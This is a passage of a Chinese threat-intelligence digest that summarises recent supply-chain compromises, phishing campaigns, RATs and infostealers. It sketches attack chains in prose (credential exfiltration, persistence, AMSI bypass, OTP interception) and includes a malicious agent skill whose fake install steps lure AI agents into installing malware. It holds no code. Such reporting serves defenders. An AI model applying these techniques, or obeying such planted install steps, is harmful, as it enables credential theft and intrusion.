leaf="">攻击者劫持了Packagist上的intercom/intercom-php包，在5.0.2版本中植入恶意Composer插件，安装期间会下载Bun JavaScript运行时并执行混淆的凭证窃取载荷，窃取GitHub令牌、SSH密钥、云凭证和环境变量后加密外泄，这是Mini Shai-Hulud攻击从npm扩展到PHP生态的最新活动。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">04</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">钓鱼活动滥用受信任的谷歌服务劫持数万个 Facebook 帐户</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月29日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://guard.io/labs/accountdumpling---hunting-down-the-google-sent-phishing-wave-compromising-30-000-facebook-accounts" target="_blank">https://guard.io/labs/accountdumpling---hunting-down-the-google-sent-phishing-wave-compromising-30-000-facebook-accounts</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者滥用Google AppSheet的通知系统，发送经过完整SPF、DKIM和DMARC认证的虚假邮件，冒充Meta官方通知，诱骗Facebook用户访问Netlify、Vercel或Google Drive上的钓鱼页面，窃取登录凭证、双重验证码、身份证照片等敏感信息，并通过Telegram机器人实时接收被盗数据，部分页面还采用WebSocket实现人工操控。该活动已导致约三万个账户被盗，大部分受害者位于美国，溯源指向一名越南籍人员Pham Tai Tan及其关联的服务网站。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">05</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">新型网络钓鱼活动瞄准美国窃取凭证</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月5日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://any.run/cybersecurity-blog/us-fake-invitation-phishing/" target="_blank">https://any.run/cybersecurity-blog/us-fake-invitation-phishing/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ANY.RUN研究人员发现一场针对美国跨行业机构的大规模钓鱼活动，攻击者利用可重复使用的钓鱼框架批量部署假活动邀请函页面，通过CAPTCHA验证后诱导受害者输入邮箱凭证与OTP验证码，或自动下载ScreenConnect、ITarian、Datto RMM等合法远程管理工具，进而实现账户接管或未经授权的远程访问。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">06</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">DAEMON Tools软件感染自2026年4月8日起持续进行</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月5日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://securelist.com/tr/daemon-tools-backdoor/119654/" target="_blank">https://securelist.com/tr/daemon-tools-backdoor/119654/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">DAEMON Tools软件的合法安装程序自2026年4月8日起被植入恶意载荷，攻击者通过信息收集器获取受感染系统的MAC地址、进程列表等指纹信息，并有选择地向俄罗斯、白俄罗斯和泰国的政府、科研及制造业等少数目标部署更复杂的后门。</span></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034956" src="https://wechat2rss.xlab.app/img-proxy/?k=c61adf93&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqiblibhVN1Da3TD6S7A9tPRDslvM7YKUmyl7icMEOp48QfPHAv8oTKZVuJppFUuE3MM4X3cMxPv6NwwbYHslzXGIOznS8fWlrV5Ow%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034957" src="https://wechat2rss.xlab.app/img-proxy/?k=aec9a9a0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqibVhq3IDy9JhmYgRKUfdaR9FUCBxDViaDdicbJKGgCibRpEqo5OXACz9RHGHpkGI4DDMIX6tw0vDcNnrhYvNficImwXbzEPcE43pZc%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意代码情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034959" src="https://wechat2rss.xlab.app/img-proxy/?k=cebf56ec&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqiblgZfffBhUM8b6E6mWSaKRVVcMy4yB9ibiaibuq6t5mLFmy7ehrticH5Psumz0kvpPKQJs99OsdHcCr22Dic7vG2wA0JgJJzUoEwRw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034962" src="https://wechat2rss.xlab.app/img-proxy/?k=d14f90ea&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq8Qzvro6MuYsVwCwa8HSStqUK7SbdXxyb1gWuiaiciaZolKZspQ3PT5eaDPu7YibgjRrndoCXJmKNZWMkI36utMsXbSjZAicaBfOPYA%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">人工智能驱动的一体化网络钓鱼工具包Bluekit</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月29日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.varonis.com/blog/bluekit" target="_blank">https://www.varonis.com/blog/bluekit</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Varonis Threat Labs发现名为Bluekit的新型AI驱动全能钓鱼工具包，它将40余种网站模板、自动域名注册、双因素认证绕过、反机器人伪装、地理位置模拟及AI助手等功能整合至单一面板，使攻击者能够快速构建并运营针对邮箱、云账户、开发者平台、社交媒体及加密货币服务的高仿真钓鱼活动。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">CloudZ RAT 利用 Pheno 插件窃取 OTP 消息</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月5日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://blog.talosintelligence.com/cloudz-pheno-infostealer/" target="_blank">https://blog.talosintelligence.com/cloudz-pheno-infostealer/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Cisco Talos研究人员披露了一场自2026年1月起持续活跃的入侵活动，攻击者利用模块化远控木马CloudZ及其Pheno插件，通过滥用Windows内置的Phone Link应用窃取受害者凭证与认证码。攻击链始于伪装成ScreenConnect更新的恶意可执行文件，释放Rust编译的加载器后部署伪装成文本文件的.NET加载器，后者通过创建名为SystemWindowsApis的计划任务并滥用regasm.exe实现持久化，执行前进行多重反分析检测。CloudZ采用ConfuserEx混淆，通过加密TCP套接字连接C2服务器，支持浏览器凭证窃取、屏幕录制、插件加载等命令，并从Pastebin或Cloudflare Workers获取二级配置。Pheno插件专门扫描YourPhone、PhoneExperienceHost等Phone Link相关进程，识别PC与手机间的本地代理连接，进而访问存储同步短信与通知数据的SQLite数据库，使攻击者能够在不感染移动设备的情况下拦截短信OTP和认证应用通知，从而绕过基于短信的多因素认证，将攻击面从手机转移至企业管理的Windows终端。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">03</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意 OpenClaw 技能分发 Remcos RAT 和 GhostLoader</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月5日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.zscaler.com/blogs/security-research/malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader" target="_blank">https://www.zscaler.com/blogs/security-research/malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者利用OpenClaw框架的恶意技能DeepSeek-Claw，通过伪造的安装指令诱导用户或AI代理执行，在Windows上使用DLL侧载和内存加载器部署Remcos远控木马，在macOS和Linux系统上通过Node.js载荷安装GhostLoader信息窃取器，以窃取凭证、加密货币钱包和敏感数据。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034965" data-ratio="0.6194331983805668" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="988" src="https://wechat2rss.xlab.app/img-proxy/?k=adc46a4f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOq9t7I6EBesyicKbqAR8wVNr9vEhjmEpHhQBlub6EekpA46ibwtYwRhG2aNf0rGug0oA1763zia0q8IyWhyBW3zyFnqia9UAInPyicibg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">04</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">InstallFix 攻击活动利用伪造的 Claude AI 安装页面诱骗用户运行恶意软件</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月5日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.trendmicro.com/en_us/research/26/e/installfix-and-claude-code.html" target="_blank">https://www.trendmicro.com/en_us/research/26/e/installfix-and-claude-code.html</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者利用Google Ads推广伪造的Claude AI安装页面，诱导用户复制运行恶意PowerShell命令，通过mshta.exe下载ZIP与HTA混合文件，执行VBScript并绕过AMSI和SSL证书验证，最终在内存中执行shellcode，收集浏览器和电子钱包数据，同时创建计划任务实现持久化。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100034974" data-ratio="0.6852085967130215" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="791" src="https://wechat2rss.xlab.app/img-proxy/?k=a6750a7b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOqicdEYl95MSbsd7CKEoicXiaLccqMU2HhvYSxHTAxYF4yUW6xiasm1ZXkSdgmOrzZBcZzDzhphOiaupDWfpcebU90EV0XqtKF94wYaA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034971" src="https://wechat2rss.xlab.app/img-proxy/?k=b6cf86d4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq9BgDApwTpZz7UwcJYEvoWt4sRgBG7nRsezDjxsGuBnYAXa9H1uotSmCYUibQ5WSPIW2D2SPEx7YchUItiavm5XhaF08yVJZ8s5U%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: 